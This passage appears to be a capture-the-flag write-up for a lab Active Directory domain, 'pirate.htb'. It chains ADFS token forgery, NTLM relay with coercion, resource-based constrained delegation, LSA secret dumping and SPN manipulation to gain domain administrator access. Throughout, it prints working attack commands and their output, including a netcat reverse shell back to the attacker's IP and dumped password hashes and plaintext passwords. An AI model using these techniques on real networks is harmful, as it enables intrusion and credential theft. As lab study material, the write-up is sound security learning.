g2ol8JmIfnooqvNSDJiMB9I7FVwo1reBLPvWvDUWJUg4nxJZBSBsfpnXdwJVYVhqJ94R1bcfE2MICPg5K1T6jAuxOrAXrGjmb/cMZgHKzE5FQBPdlvE74jo1++NCgSff0HX/XdcAdJuYu7F9WDD7AHOkgSNtQsVGH3eB1RkbWInc5Bu2R49L8dwfWfM031LSGWso7kRIeuAdL70Xd5+xLsofd0goPocxl/qFrPBq+6ssfxANPqyxsBjwNvS9sF6kezHjzSHoJqs8g3w+X/gvLDc4BB+HXV0Ix2Fug+dmTgW3rFOXFs189hxuE5rwTglQFSU+Tx7RyTktf0yqCTmFPNWqjOmQTob2T+yneqJ8UPxtmDryc7x+XJN' | base64 -d > TKSKey.bin
echo -n '7C-5B-51-35-74-58-CD-98-F0-0F-7E-CC-07-F4-60-BB-FC-7D-E9-68-95-07-4C-4E-FD-29-1B-5A-75-3A-2C-E4' | tr -d "-" | xxd -r -p > DKMkey.bin
Download ADFSSppof.
python ADFSpoof/ADFSpoof.py -b TKSKey.bin DKMkey.bin dump
We get a file token.pfx.
We could obtain valid SAML2 tokens for services with any user, for example:
python ADFSpoof/ADFSpoof.py -b TKSKey.bin DKMkey.bin -s adfs.pirate.htb saml2 --endpoint https://WEB01/adfs/ls/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PIRATE\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PIRATE\administrator</AttributeValue></Attribute>'
In reality, I did not quite understand whether there are services on WEB01 or DC01 where this can be exploited.
Therefore, I proceeded with another route.
NTLM Relay and RBCD
In the initial nxc ldap command, we can notice:
signing:None
Therefore, we can coerce an authentication from WEB01$ and perform an NTLM relay to LDAPS on the dc01.pirate.htb domain controller.
We need to use a local authentication, as explained here: https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
Therefore, we need to register a DNS entry with the name web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.
python3 bloodyAD/bloodyAD.py --host dc01.pirate.htb -d pirate.htb --dc-ip 10.129.11.148 -u pentest -p 'p3nt3st2025!&' add dnsRecord 'web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' 10.10.16.149
[+] Adding "web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" to "DC=pirate.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=pirate,DC=htb"
[+] web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA has been successfully added
Run in one terminal:
ntlmrelayx.py -t ldaps://dc01.pirate.htb -smb2support --interactive
Run in another terminal:
coercer coerce -l 'web011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -t 192.168.100.2 -u pentest -p 'p3nt3st2025!&' -d pirate.htb -v --always-continue
In the terminal running ntlmrelayx, we get:
[*] (HTTP): Client requested path: /whb/pipe/srvsvc
[*] (HTTP): Authenticating connection from PIRATE/WEB01$@10.129.12.191 against ldaps://dc01.pirate.htb SUCCEED [1]
[*] ldaps://PIRATE/WEB01$@dc01.pirate.htb [1] -> Started interactive Ldap shell via TCP on 127.0.0.1:11000 as PIRATE/WEB01$
nc 127.0.0.1 11000
# set_rbcd WEB01$ gMSA_ADFS_prod$
Found Target DN: CN=WEB01,CN=Computers,DC=pirate,DC=htb
Target SID: S-1-5-21-4107424128-4158083573-1300325248-3102
Found Grantee DN: CN=gMSA_ADFS_prod,CN=Managed Service Accounts,DC=pirate,DC=htb
Grantee SID: S-1-5-21-4107424128-4158083573-1300325248-4108
Delegation rights modified successfully!
gMSA_ADFS_prod$ can now impersonate users on WEB01$ via S4U2Proxy
getST.py -spn 'cifs/web01.pirate.htb' -impersonate 'Administrator' -dc-ip 10.129.12.191 -hashes ':8126756fb2e69697bfcb04816e685839' pirate.htb/'gMSA_ADFS_prod$'
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache
export KRB5CCNAME='Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache'
nxc smb 192.168.100.2 -u Administrator -k --use-kcache --lsa
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB 192.168.100.2 445 WEB01 [+] pirate.htb\Administrator from ccache (Pwn3d!)
SMB 192.168.100.2 445 WEB01 [*] Dumping LSA secrets
SMB 192.168.100.2 445 WEB01 PIRATE.HTB/Administrator:$DCC2$10240#Administrator#8baf09ddc5830ac4456ee8639dd89644: (2026-02-25 02:41:09)
SMB 192.168.100.2 445 WEB01 PIRATE.HTB/gMSA_ADFS_prod$:$DCC2$10240#gMSA_ADFS_prod$#66812dfee46ff41c9c8245a2819c3183: (2026-03-03 16:33:19)
SMB 192.168.100.2 445 WEB01 PIRATE.HTB/a.white:$DCC2$10240#a.white#366c8924be3ea6d1d12825569a4bcc39: (2026-03-03 16:31:16)
SMB 192.168.100.2 445 WEB01 PIRATE\WEB01$:plain_password_hex:29f1505d87014b01b4317fed1d52ddbee2792a698e7e1de1bcdf29ab5d4b8e54828ce470d23491ba84e82d786622a821a14c730cf8610a32db1951b7619ee08c3bcacbab53aac8e052bd64e638c6bbd9529daacf04f86cfb9034808c4378d2c328c8c6afe7655f4a099dc41caeb6279c53313edcbd58db3e14490b7543ba3250ac200ec9834992b61b3f4319162645b50f402de4db0843fc43db7d54e04828abf86e490959bc88670e50f0b50373a3745f70039f8fd032435c4a725526957c7ae0dbaa81273b3aa28c0b029fea90c271b6601ef3ba7a05a13ec8c8ffd9999dd10eee87b4b9eb08a8a4af90710056f558
SMB 192.168.100.2 445 WEB01 PIRATE\WEB01$:aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9:::
SMB 192.168.100.2 445 WEB01 PIRATE\a.white:E2nvAOKSz5Xz2MJu
SMB 192.168.100.2 445 WEB01 dpapi_machinekey:0x01cffc2ef9a91d20107371f9a4a4112c892ed989
dpapi_userkey:0xa4fddb1b2df2db7cc3d044dc1b559bc1b45a1de9
SMB 192.168.100.2 445 WEB01 _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11:e3ef474b98138dd4469f6dc176f879ba1e0817ba44502187b9080b9f3334c91b9b1af1ce4e91fb562c8d8824412c700e00d105bc674d8e26a594e3da4173f2c87313d634b39c3412d4bfb6849247686df6065b536566807e0ace92f94ea3166bb9752d12d352c89b9fdafa7d3171e4dd55be9d585504f8c628a0ff4c670d7595a909a3c9a7ec2dff984e5ddf77049a91a5597f0a39c5499455675901cce41aded98d80a1b5f7f82cc220b590df4bfc0bfc5f0feb66e73a56f1ab7fe914c6d7cd2b83e0b9065b76e02bc330f7694416f3acd6c463df84923500b64a1014e74413809a7a06af577ce7685bfd2ab56a2067
SMB 192.168.100.2 445 WEB01 _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11:01000000220100001000000012011a01b6c4083911a28350b1fd6948803650e1b1c5741f7719b1f4ff926203dcdf4ec9c0369b7b92fe10a2d7ff953bfa406a3b6786523ed82767cc8fe2734af892e98efbef2b3476759032b4ecdef34276c363b8a9410b63d809ea6ef167f5b541d73c3ac4214da22a14d97982c928d91bb971fe99d4809c1ebdeae8e769c6b3377ee1a478dffbb2ddc13318be131167d1a4a01833a4c27e0512690d73de1e59a01761ec7d40fc1882050cbf439d9cbb281a06d4bf8d85d1feb2740ec399eca0e46e36990b72b2c4a64ae009bafb3dfd264ff734b63fb922609e8c305883a75d9aef75ce37bca0910436590d9312fca46ad89a61a89bddc873197de48eab3d69b9e49800001941b01b7317000019e3df6872170000
SMB 192.168.100.2 445 WEB01 GMSA ID: a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11 NTLM: 841fae962662f0c2f0178d01d178ec3e
SMB 192.168.100.2 445 WEB01 [+] Dumped 9 LSA secrets to /home/kali/.nxc/logs/lsa/WEB01_192.168.100.2_2026-03-04_004610.secrets and /home/kali/.nxc/logs/lsa/WEB01_192.168.100.2_2026-03-04_004610.cached
We found a.white's password.
nxc smb 192.168.100.2 -u a.white -p 'E2nvAOKSz5Xz2MJu'
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB 192.168.100.2 445 WEB01 [+] pirate.htb\a.white:E2nvAOKSz5Xz2MJu
Now we can obtain a shell as a.white on WEB01 using RunasCs.exe.
Upload RunasCs to WEB01 and nc64.exe.
Listen with netcat:
rlwrap nc -vlnp 4444
In the gMSA_ADFS_prod$ PowerShell shell on WEB01:
.\RunasCs.exe -b a.white "E2nvAOKSz5Xz2MJu" "C:\tmp\nc64.exe -e cmd.exe 10.10.16.149 4444"
We get a reverse shell as user a.white.
On the user's desktop, we find the user flag.
From BloodHound, we notice that a.white can change a.white_adm's password.
python3 bloodyAD/bloodyAD.py --host dc01.pirate.htb -d pirate.htb --dc-ip 10.129.12.191 -u a.white -p 'E2nvAOKSz5Xz2MJu' set password a.white_adm 'Summer2025!'
[+] Password changed successfully!
nxc smb dc01.pirate.htb -u a.white_adm -p 'Summer2025!'
SMB 10.129.12.191 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.12.191 445 DC01 [+] pirate.htb\a.white_adm:Summer2025!
From BloodHound, we see that a.white_adm is a member of the IT group, which has a WriteSPN relationship to DC01.
Also, if we inspect a.white_adm:
python3 bloodyAD/bloodyAD.py --host 'dc01.pirate.htb' -d pirate.htb --dc-ip 10.129.12.191 -u 'pentest' -p 'p3nt3st2025!&' get object 'a.white_adm'
We notice:
msDS-AllowedToDelegateTo: http/WEB01.pirate.htb; HTTP/WEB01
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; TRUSTED_TO_AUTH_FOR_DELEGATION
Therefore, it can impersonate any user for the http/WEB01.pirate.htb and HTTP/WEB01 SPNs.
Let's look at the SPNs of WEB01$.
Download krbrelayx.
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'WEB01$' -s aaaaaa -q dc01.pirate.htb
DN: CN=WEB01,CN=Computers,DC=pirate,DC=htb - STATUS: Read - READ TIME: 2026-03-04T01:17:54.423153
dNSHostName: WEB01.pirate.htb
sAMAccountName: WEB01$
servicePrincipalName: tapinego/WEB01
tapinego/WEB01.pirate.htb
WSMAN/WEB01
WSMAN/WEB01.pirate.htb
HOST/WEB01.pirate.htb
RestrictedKrbHost/WEB01.pirate.htb
HOST/WEB01
RestrictedKrbHost/WEB01
TERMSRV/WEB01.pirate.htb
TERMSRV/WEB01
HTTP/WEB01
HTTP/WEB01.pirate.htb
We can see those two SPNs.
Therefore, if we try to add them to DC01$, we get an error:
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s http/WEB01.pirate.htb dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[!] Could not modify object, the server reports a constrained violation
[!] You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)
[!] To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute
However, since we have compromised WEB01$, we can simply remove those SPNs.
python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s http/web01.pirate.htb -r dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s http/web01 -r dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
Now we can add those two SPNs to DC01 using a.white_adm's credentials.
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s http/web01.pirate.htb dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s http/web01 dc01.pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
Now we can request a ticket for Administrator with one of those two SPNs.
getST.py -spn 'HTTP/web01.pirate.htb' -impersonate 'Administrator' -dc-ip 10.129.12.191 pirate.htb/'a.white_adm':'Summer2025!'
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache
Important: I used uppercase HTTP in the SPN, because otherwise Evil-WinRM did not work afterward.
The HTTP protocol is used by WinRM. However, to obtain a PowerShell session, we also need the WSMAN/WEB01 and WSMAN/WEB01.pirate.htb SPNs.
We need to remove them from WEB01 and put them on DC01.
python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s wsman/web01.pirate.htb -r dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\WEB01$' -p 'aad3b435b51404eeaad3b435b51404ee:feba09cf0013fbf5834f50def734bca9' -t 'WEB01$' -s wsman/web01 -r dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s wsman/web01 dc01.pirate.htb
python3 krbrelayx/addspn.py -u 'pirate.htb\a.white_adm' -p 'Summer2025!' -t 'DC01$' -s wsman/web01.pirate.htb dc01.pirate.htb
export KRB5CCNAME='Administrator@HTTP_web01.pirate.htb@PIRATE.HTB.ccache'
Before connecting with Evil-WinRM, we need to add web01.pirate.htb to /etc/hosts for the IP address of dc01.pirate.htb (in my case, 10.129.12.191).
Now we can connect with Evil-WinRM:
evil-winrm -i web01.pirate.htb -r pirate.htb
Important: I used web01.pirate.htb, not dc01.pirate.htb.
We get a PowerShell shell as Administrator.
hostname
DC01
whoami
pirate\administrator